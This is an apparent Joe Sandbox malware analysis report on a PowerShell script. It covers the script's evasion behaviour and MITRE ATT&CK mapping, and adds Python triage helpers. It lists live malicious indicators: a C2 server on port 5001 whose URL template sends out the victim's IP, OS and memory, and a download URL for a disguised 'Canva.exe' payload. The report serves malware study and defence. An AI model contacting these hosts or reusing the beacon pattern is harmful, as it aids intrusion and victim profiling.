Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb | source: powershell.exe, 00000000.00000002.1353705363.0000000008830000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_05302D0D push esp; iretd 0_2_05302D01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_05300C6D push ebx; iretd 0_2_05300C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_05302CCD push esp; iretd 0_2_05302D01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0530D0F8 push eax; mov dword ptr [esp], edx 0_2_0530D10C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0A332264 push E801005Eh; ret 0_2_0A332269
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0A33215A push E801005Eh; retf 0_2_0A332161
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0A33245C push E801005Eh; retf 0_2_0A332461
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0A332564 push E801005Eh; ret 0_2_0A332569
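Added example, not code from Joe Sandbox or from the analysed script: a small Python scanner for the push imm32; ret / retf pattern behind the "Code function" lines above. A push of an immediate followed by a return transfers control to the pushed value without a call or jmp, which is why the report classifies it as (call, push, ret) obfuscation; the same byte sequence also appears when a disassembler starts mid-instruction in JIT-compiled .NET or packed code, so each hit records whether the target even lies inside the scanned image. The base address 0x0A332000 and the byte layout of the sample blob are assumptions for illustration; only the immediate E801005Eh is taken from the report.

```python
"""Scan a 32-bit code blob for `push imm32; ret` and `push imm32; retf`."""
import struct

PUSH_IMM32 = 0x68   # push imm32 (5-byte encoding)
RET_NEAR = 0xC3     # ret
RET_FAR = 0xCB      # retf


def find_push_ret(blob: bytes, base: int):
    """Return one dict per `push imm32` that is directly followed by ret/retf.

    The scan slides one byte at a time instead of disassembling linearly,
    which is how a sandbox can report hits at odd offsets. `base` is the
    virtual address of blob[0].
    """
    hits = []
    end = base + len(blob)
    for i in range(len(blob) - 5):
        if blob[i] != PUSH_IMM32 or blob[i + 5] not in (RET_NEAR, RET_FAR):
            continue
        target = struct.unpack_from("<I", blob, i + 1)[0]
        hits.append({
            "addr": base + i,             # address of the push
            "ret_addr": base + i + 5,     # address of the ret/retf
            "target": target,             # where control transfers to
            "kind": "ret" if blob[i + 5] == RET_NEAR else "retf",
            # a target outside the image is usually a misaligned decode,
            # not a real control transfer
            "target_in_image": base <= target < end,
        })
    return hits


def format_hit(hit):
    """Render a hit in the report's own 'ADDR push XXXXXXXXh; ret ADDR' style."""
    return (f"{hit['addr']:08X} push {hit['target']:08X}h; "
            f"{hit['kind']} {hit['ret_addr']:08X}")


# Constructed sample bytes (assumed layout, not bytes from the analysed script):
# NOP padding, the push/ret and push/retf encodings of the immediate the report
# shows (E801005Eh), and one push whose target falls inside the image.
SAMPLE_BASE = 0x0A332000
SAMPLE_BLOB = (
    b"\x90" * 8
    + b"\x68\x5E\x00\x01\xE8\xC3"   # push 0E801005Eh ; ret
    + b"\x90" * 4
    + b"\x68\x5E\x00\x01\xE8\xCB"   # push 0E801005Eh ; retf
    + b"\x90" * 4
    + b"\x68\x10\x20\x33\x0A\xC3"   # push 0A332010h ; ret  (in-image target)
    + b"\x90" * 4
)

if __name__ == "__main__":
    for h in find_push_ret(SAMPLE_BLOB, SAMPLE_BASE):
        note = "" if h["target_in_image"] else "  <- target outside image"
        print(format_hit(h) + note)
```

When triaging, weight hits whose target lands inside the mapped image far higher than the out-of-image ones; the latter are what a one-byte-stride scan produces from the middle of ordinary instructions.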

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49705
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (152 occurrences)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6311
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3413
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: powershell.exe, 00000000.00000002.1354012806.0000000008947000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1353705363.0000000008858000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
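Added example, not part of the Joe Sandbox report: a Python triage helper that parses behaviour lines in the form this page uses (the extracted text runs the source path straight into the action name and appends a "Jump to behavior" link label), collapses verbatim repeats such as the NOOPENFILEERRORBOX run, and flags the three records above that actually drive the verdict: the HTTP traffic to port 5001, the very long thread delay and the Win32_ComputerSystem WMI query. Two assumptions the report does not state: "delay time" values are taken as milliseconds so that the report's own "long sleeps (>= 3 min)" threshold can be applied, and the lower port of an HTTP flow is treated as the service port. The sample lines are copies of lines from this page plus one non-behaviour line.

```python
"""Parse Joe Sandbox behaviour lines, collapse repeats, flag evasion records."""
import re
from collections import Counter

ACTIONS = (
    "Section loaded|File opened|Process information set|Thread delayed|"
    "Thread sleep time|Network traffic detected|WMI Queries|"
    "Queries volume information|Process token adjusted|Key value queried"
)
# Accepts both the fused form ("powershell.exeSection loaded: x") and a
# " | " separator, and drops a trailing "Jump to behavior" link label.
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.*?)\s*(?:\|\s*)?(?P<action>" + ACTIONS + r"):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?$"
)
LONG_SLEEP_MS = 3 * 60 * 1000                       # report threshold: >= 3 min
STANDARD_HTTP_PORTS = {80, 8080, 8000, 443, 8443}   # assumed baseline


def parse_line(line):
    """Split one report line into source / action / detail, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {k: m.group(k) for k in ("source", "action", "detail")}


def triage(lines):
    """Return (Counter of (action, detail) -> repeat count, ordered list of flags)."""
    counts = Counter()
    flags = []

    def flag(text):
        if text not in flags:
            flags.append(text)

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        action, detail = rec["action"], rec["detail"]
        counts[(action, detail)] += 1
        if action == "Thread delayed":
            m = re.search(r"delay time:\s*(\d+)", detail)
            if m and int(m.group(1)) >= LONG_SLEEP_MS:   # assumes milliseconds
                flag(f"long sleep: {int(m.group(1))} ms")
        elif action == "Network traffic detected":
            m = re.search(r"HTTP traffic on port (\d+) -> (\d+)", detail)
            if m:
                service = min(int(m.group(1)), int(m.group(2)))  # assumed service side
                if service not in STANDARD_HTTP_PORTS:
                    flag(f"HTTP on non-standard port {service}")
        elif action == "WMI Queries" and "Win32_ComputerSystem" in detail:
            flag("WMI Win32_ComputerSystem query (common VM check)")
    return counts, flags


# Constructed sample: lines copied from this report plus one that is not a
# behaviour line, to show it is skipped rather than mis-parsed.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LINES = [
    f"Source: {PS}Section loaded: winhttp.dllJump to behavior",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 5001",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49700",
    f"Source: {PS}Process information set: NOOPENFILEERRORBOXJump to behavior",
    f"Source: {PS}Process information set: NOOPENFILEERRORBOXJump to behavior",
    f"Source: {PS}Process information set: NOOPENFILEERRORBOXJump to behavior",
    f"Source: {PS}Thread delayed: delay time: 922337203685477Jump to behavior",
    f"Source: {PS}WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_ComputerSystem",
    "Loading Joe Sandbox Report ...",
]

if __name__ == "__main__":
    counts, flags = triage(SAMPLE_LINES)
    for (action, detail), n in counts.most_common():
        print(f"{n:4d}  {action}: {detail}")
    for f in flags:
        print("FLAG:", f)
```

The repeat count is what makes the NOOPENFILEERRORBOX block readable, but it carries no verdict on its own: SetErrorMode is set by ordinary .NET hosts too. The flags list is the part worth feeding into a ticket.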
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\Pmw24ExIdx.ps1 VolumeInformationJump to behavior
MITRE ATT&CK matrix, reconstructed from the flattened table. Per tactic, techniques the matrix marks with a hit count are listed first (count in parentheses, as printed in the cell); the remaining cells of that column had no matching signature.
  Reconnaissance: no hits (Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS)
  Resource Development: no hits (Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services)
  Initial Access: no hits (Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services)
  Execution: Windows Management Instrumentation (1); no hits: Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
  Persistence: DLL Side-Loading (1); no hits: Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
  Privilege Escalation: Process Injection (1), DLL Side-Loading (1); no hits: Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
  Defense Evasion: Virtualization/Sandbox Evasion (31), Process Injection (1), Obfuscated Files or Information (1), DLL Side-Loading (1); no hits: Software Packing, Steganography, Compile After Delivery
  Credential Access: no hits (OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync)
  Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), System Network Configuration Discovery (1), File and Directory Discovery (1), System Information Discovery (21)
  Lateral Movement: no hits (Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management)
  Collection: Archive Collected Data (1); no hits: Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
  Command and Control: Encrypted Channel (11), Non-Standard Port (11), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (14); no hits: Multiband Communication, Commonly Used Port
  Exfiltration: no hits (Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel)
  Impact: no hits (Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery)
Antivirus scan of the submitted file (Source | Detection | Scanner):
  Pmw24ExIdx.ps1 | 15% | Virustotal
  Pmw24ExIdx.ps1 | 11% | ReversingLabs
The three further antivirus scan tables of the report each report: No Antivirus matches.
URL scan (Source | Detection | Scanner | Label):
  http://91.206.178.120:5001/script_end?random_number= | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_end?random_number=$randomNumber | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_end?random_number=66350$M | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_end?random_number=66350 | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | 100% | Avira URL Cloud | malware
  https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exe | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_start?ip= | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001 | 100% | Avira URL Cloud | malware
  https://goutteuy.com | 0% | Avira URL Cloud | safe
  https://goutteuy.com/wp-content/p | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 | 100% | Avira URL Cloud | malware
  http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | 100% | Avira URL Cloud | malware
Domains (Name | IP | Active | Malicious | Antivirus detection | Reputation):
  goutteuy.com | 185.211.7.193 | true | true | none | unknown
  maxcdn.bootstrapcdn.com | 104.18.11.207 | true | false | none | high
  api.ipify.org | 104.26.12.205 | true | false | none | high
  241.42.69.40.in-addr.arpa | unknown | unknown | false | none | high
The last entry is a reverse lookup of 40.69.42.241, one of the IPs the cookbook whitelists below, so it is sandbox background traffic rather than sample behaviour.
URLs contacted (Name | Malicious | Antivirus detection | Reputation):
  https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | false | none | high
  https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exe | true | Avira URL Cloud: malware | unknown
  http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 | true | Avira URL Cloud: malware | unknown
  http://api.ipify.org/ | false | none | high
URLs found in memory dumps and the script file (Name | Source | Malicious | Antivirus detection | Reputation):
  http://91.206.178.120:5001/script_end?random_number=66350 | powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  http://91.206.178.120:5001/script_end?random_number=$randomNumber | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp; notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp; Pmw24ExIdx.ps1 | false | Avira URL Cloud: malware | unknown
  https://go.micro | powershell.exe, 00000000.00000002.1346667806.0000000005C05000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  https://maxcdn.bootstrapcdn.com/ | powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmp | false | none | high
  http://91.206.178.120:5001/script_end?random_number= | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  http://www.microsoft.co | powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
  https://contoso.com/License | powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  https://contoso.com/Icon | powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  http://91.206.178.120:5001/script_start?ip= | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  http://91.206.178.120:5001/script_end?random_number=66350$M | powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  http://91.206.178.120:5001 | powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css. | powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
  http://api.ipify.org | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp; notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp; notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp; Pmw24ExIdx.ps1 | false | none | high
  https://goutteuy.com | powershell.exe, 00000000.00000002.1346667806.0000000005697000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp; notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp; notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp; Pmw24ExIdx.ps1 | false | Avira URL Cloud: malware | unknown
  https://maxcdn.bootstrapcdn.com/) | powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmp | false | none | high
  http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  https://aka.ms/pscore6lB | powershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  https://goutteuy.com/wp-content/p | powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
  https://contoso.com/ | powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | false | none | high
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmp | false | none | high
Two caveats when reading this table. Entries containing $ipAddress, $osVersion, $memory or $randomNumber are the unexpanded URL template as it appears in Pmw24ExIdx.ps1; the entries with concrete values are the same template after the script filled it in at run time. Entries that stop mid-word (https://go.micro, http://www.microsoft.co, ...&m) are string-carving artefacts from memory, not distinct URLs, and the nuget.org, contoso.com, pesterbdd.com and apache.org strings come from PowerShell's own bundled modules rather than from the sample.
IPs (IP | Domain | Country | ASN | ASN name | Malicious):
  104.18.11.207 | maxcdn.bootstrapcdn.com | United States | 13335 | CLOUDFLARENETUS | false
  104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
  185.211.7.193 | goutteuy.com | Germany | 46261 | QUICKPACKETUS | true
  91.206.178.120 | unknown | Poland | 200088 | ARTNET2PL | true
